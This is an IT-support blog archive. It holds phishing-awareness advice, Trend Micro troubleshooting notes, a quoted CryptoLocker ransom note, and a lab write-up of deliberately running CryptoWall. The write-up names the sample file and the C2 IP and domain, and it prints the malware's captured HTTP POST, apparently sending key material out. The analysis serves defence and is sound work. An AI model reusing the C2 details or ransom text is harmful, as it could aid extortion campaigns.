Archive for category IT

Think before you click

Are you worried someone is going to steal your passwords? your details? your money? your privacy? your confidential company secrets? Your employers business? Your livelihood?


You have good reason to worry. Malicious people out there are trying to steal these very things and more. Both indirectly and directly. Everyone is a target. They don’t care who you are, they want your assets or want to leverage you to get to someone else’s assets.

They want to trick you, rip you off and make your life a misery. After all, they can make good money wrecking your life.


We as IT people help you to select antivirus, firewalls and implement security.


Unfortunately you are still the weakest link in the security chain.


So, what rules can help keep you safe?


Think before you click. Stop the click. Avoid the click. Just think a few more seconds before you push that mouse button. 



 stop the click


When you are on the internet, in your email, receive a USB drive from an unknown source or a friend’s external hard disk full of movies, don’t click on suspicious things!


Just in case the little voice in your head has not learnt how to warn you about suspicious things, here are our rules. 


It’s Free! If something proclaims it is free, it is likely not. Stop and think, how are they making money? How are they staying in business? How do they get funding? Can you trust their software? Can you trust their ethics?

Emails claiming you have gained access to something for free, web popups offering items for free or free software, can often lead you into a painful mess. If you have not paid for it, then I hope you researched it thoroughly before you jumped into it.


It is often said that if the product is free, you are the product. Turns out that you’re also the lab rat.


If you can’t afford something, don’t go looking for free solutions on the internet. Often you will end up being caught out. Be very careful.


You Won! If you won something, did you enter to win? Did you really enter that lottery? are you really the millionth visitor to a website? Can you really make money entering this scheme?

If you click now, do you really get an iPad? If you download this new toolbar, will it make your life better?
Chances are no. You did not enter these things nor have you won anything. Dismiss that email, that internet popup or popup from your program. It is after you.
Panic and click now! That email you received about illegal activity occurring on your bank account, accidental bank fee overcharge, your suspended account, an unexpected Tax return, urgent court appearance, invoice you have overdue, post item you have been waiting for you, shipping notice for a surprise parcel … all have urgency. All want you to click.
Don’t believe it. Don’t follow any link in the email. Don’t open the attachments. Don’t run anything, don’t give it your passwords.
No matter how realistic and correct the logos are, how accurate their data is, treat it with scepticism. The senders spend ages trying to make their messages seem authentic.
Think to yourself, do I actually have an account with these guys? Have I opted for email invoices from them? Do I have a parcel on the way?
If you answer yes, then manually go to a browser, type in their web address as you know it (not from the email), change your passwords online, download your invoice and complete your business under your terms.
Often when you hover over the links in the email or on a webpage, it is taking you to somewhere else other than where it is meant to.
Always manually go to a website to logon or change details, never follow an email link.
Missed messages You have an email about a missed Facebook, Google, Phone, Mobile or Fax message. Attached is the message. Don’t open it. Sign into these services and check your messages. Don’t use links in the email or look at the attachments. Think, do you actually use these services ? Can your mobile send you an email if you miss a message?


Awesome Job offer You have an email about a job opportunity. You happen to be looking for a job so you click the email right? Wrong. At best this is a random email sent to you coincidently and you will get a job that is not legal, is looking to exploit you or maybe you will not get paid. At worst this thing is going to hack you. Unless you have signed up for job alerts and get emails as expected, don’t open these things.


Safe in Web mail You have a suspect email but it is in your web email so you are safe to open the attachment as it will not affect your pc. Wrong. It will get you and your PC. 


Save money on downloads Your son/daughter has found a way to download music and movies for free. They can also get you free software like the latest Microsoft Office. You get it from them as you trust them. Whoops.

You have stepped into a trust network which contains people whom likely know little about how vulnerable they are. Most of these things are pirated. Many of the tools and websites that support these downloads will hack you and give you additional things inside your download that you don’t expect.


Image files, video files and even PDF files can contain viruses. Remember, free is not always free. We make a lot of money cleaning up peoples computers after they have downloaded a free “something”. 


Your Protected You have antivirus and a firewall. You are safe! No, you are not really. There are thousands of new viruses and Malware detected per hour. If your systems are only a few hours behind, then there are thousands of nasties you can’t be protected from. If you choose to download something and force it to download, many times you can override your protections or work beyond the system, making you vulnerable. At best, you are safer and have good odds.


Popups You will often get website popups offering you special prices or free things. When you click them, you will likely get more popups and you may end up downloading all kinds of things. If you get a popup and push the cancel button to make it go away, you think you are safe? No you are not! The website programmers control everything on the popup. They control the install button and the cancel button. Why can’t they make the install button, install the software as normal and make the cancel button, install something else without telling you? Of course they can. your best option is to click the cross in the top right hand corner and close the popup completely.


Toolbars You have these cool toolbars in Internet explorer that make your life easier. Sure, except many of them track your movements, download other tools and slow your browser down. Remove the toolbars and don’t accept them.


Unexpected presents You downloaded a program and afterwards, you have toolbars, new icons on the desktop and your machine runs slow. Nothing like you expected. Often many “free” tools include other “free” tools. Many of these are Malware. Read carefully the terms of the product you are installing. If the terms for your product “xxx” refer to a different product “yyy” then chances are there is something else bundled into the installation. I have seen many products where you need to carefully read the terms and click decline or cancel many times to get past the “bundled” software to get to the final product you really want. Often you need to unselect tick boxes during the install to get a clean install.


Often during the install you will spot a name or logo of one of the programs “Partner products”. It might ask “do you want to install?”, you say No. Then another product comes up and it says “Would you like to skip this offer” and as you previously said no, you don’t fully read what is on the screen and instinctively press No and guess what, it installs it. You selected no, you don’t want to skip the product. It did as it was told. Be careful on the play with words that can occur during these installs.


Updates Updating tools like Java or Adobe (As examples) can now offer you extra toolbars like ASK toolbar and the like. You need to be careful as accepting these things not only slows your machine down, it bolts sometimes badly written toolbar code into Internet explorer (So it causes crashes) and can change your default search page and home web page.


Solving your own IT problems Many people get tricked into downloading driver update tools, pc fix up tools or registry repair tools. They usually don’t help. These can be dangerous, bog your machine down and download other items.


Known types of attachments are safe Many email attachments look like a harmless PDF files but are not. It is easy to change the icon you see and choose one that you associate as safe. A malicious item can have a “safe” icon. This is further complicated as there are exploits that allow real PDF and Jpeg files to carry viruses and Malware. Simply be sceptical of any files you download or receive as attachments.

There are many other tricks we use to avoid these nasties. This short list will get you thinking. Using this list you can avoid some of the bigger nasties like Cryptolocker and Cryptowall

Think before you click !  

 

Tags: , , ,

Infecting myself with Ransomware (Exploring CryptoWall)

What, am I crazy ?

No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt,  wireshark for packet sniffing and Sysinternals Process Monitor.

So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.

So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.

There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.

As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.

PDF file

So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.

startup

 

Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.

hidden folder on c

 

So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe”  file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.

I watch it connect to 199.127.225.232 and do a HTTP post. This server is called babyslutsnil.com

POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache

 z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

 

html
head
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
body
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the  code i (confdir) /i /templates /code  directory.  The location of the  code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file.  (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
/body
/html

I can only assume it is trying to send out the RSA encryption key to the remote server.

Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).

decryot files

Then you find a key in the registry which starts off the same as the exe file name

registry

 

and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.

 

startup1

 

Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !

pay

It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.

Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.

Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.

Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!

Moral: Have offline current backups !


 

 

Tags: , , ,

Upgrade to Trend Micro Worry Free 9 causes 10 minute stall when plugging in USB storage

On one of our installations, since installing TMWF9, whenever a USB drive (Hard disk or Flash media) is installed to the Master server, explorer stops responding for 10 minutes.

Remote access for file shares on servers still works. Sharepoint, Exchange and other services are unaffected. It is just the Explorer Windows on the local server console (Which is used for the Browse feature or File explorer /My Computer).

If you open the Disk Management before inserting the drive, you note that a volume comes up, then it all stalls and the disk is not allocated a drive letter for 10 minutes.

From a command prompt, if you try and move to that disk, it stalls. If you try a non existant disk, it comes back “drive not found”. In this way I know I can navigate using CMD and switch between drive letters to valid letters, just not this new volume.  It seems the drive has started allocating resouces but it is not yet available for use.

If during this time you try and stop the Trend Agent – real-time scan service, it hangs whilst stopping until the 10 minutes is up.

If we halt that service first, USB drives go in and out as normal. If we do not halt it or it restarts, when inserting a drive, Explorer hangs again for 10 minutes.

After 10 minutes, the drive volume appears, Explorer responds and everything goes back to normal.

There are no events recorded in the EventLog :(

Tags: , , ,

Cryptolocker (Again, new and improved ?)

UPDATE: Be sure to read the comments to this post. I am posting new information and updates as comments. There is a lot of information there.

 

Yes, again we see Cryptolocker. My client emailed me the following “I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything I believe that email may have caused this issue if that is of any help”

This falls in line with other peoples observations i.e. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout

 

We have not yet worked out how this version works nor what files have been affected. Here is the text
  !!! YOUR SYSTEM IS HACKED !!! All your files was encrypted with Cryptolocker!   This means that without the decryption key the recovery of your files is not possible, If your files have a value to you and you are willing to pay me for the decryption key please contact me: decrypt-request@mail.ua   You have 3 days to pay for my services. After this period, you will lose all your files.   Anti-virus software can remove Cryptolocker, but can not decrypt your fles. The only way to recover your files -is to pay for the decryption key.   Information for IT-specialist:   Data was encrypted with AES (Rijndael) algorithm with the session key length if 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.

Here is a photo
Img_0804ed2

This is the nasty email that began it all

email

 

 

 

 

Tags: ,

Real world test of Trend Worry Free Professional

I miss Microsoft ISA/TMG. I miss being able to report staff’s internet usage, solve bottlenecks, isolate PC’s that have downloaded Malware and all the other general IT admin things that go with this.
Along comes Trend Worry Free Professional which allows you to setup your browser to the external proxy in Trend Micro’s Amazon cloud.

You can setup Ldap integration with your AD and then after the staff have used it, do reports on their activity.

This all sounds really nice.

So what are the real world issues with this product?
  • Using it from South Australia and using Proxy servers on the eastern side of Australia, my latency is huge. It adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow coming up. The experience over fibre or in the eastern states is far less exaggerated.
  •  I keep getting certificate popups. I get it for my email (Especially using Office 365), I get it for many of the HTTPS sites I use.
  • The proxy settings are easy to tamper with. Unless you lock IE settings down or force the settings via Group policy, users can bypass the proxy.
  • I have a few websites that “sometimes work”. One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
  • The built in reports are very basic. They don’t give me enough detail.

Ok, this all sounds really bad. Yes, there are some teething issues and the latency is killing me so why do I love this product ?
  • It filters all my outbound web traffic and removes Malware and viruses instantly as discovered.
  • I can dump the raw logs into Excel an do my own reports.
  • I can have external roaming users logged into this no matter where they are in the world.
  • I have control of what happens on the network.

So if you have Fibre, are in the eastern states or have a client with very little expectations (maybe they are not a big internet user) then this is an awesome tool.

If you are a geek like me, you have to work out if the tool makes your habits safer and live with it, or forge ahead as the speed annoyed you and run other protection.

Don’t forget, this is only version 1, future advancements will help.

Tags: ,

Trend Micro Worry Free 9 attachment blocking

We have just upgraded a client to TMWF9 (Another one in a long list of clients to upgrade). In the products previous configuration, attachment blocking was turned on.
Exceptions were set to allow most Microsoft Office documents in. This included Word Doc and Docx format.

After the upgrade, the attachment policy is still the same. The Doc and Docx files are allowed through however, they are not getting through.

They are being replaced with the text file saying that the attachment was removed due to policy.

We have tried turning the Attachment blocking on / off and turning the exception for Word on and off.

 

We have a case open with Trend. The only work around presently is to disable attachment blocking.

NOTE: Be aware. If Attachment blocking is on, Scanmail stomps around in your email store removing all attachments that match. Even if the attachments were placed into your mailbox years ago. It is not just an attachment blocker but also a remover of existing attachments. Don’t play with attachment blocking until you understand this.

Tags: , ,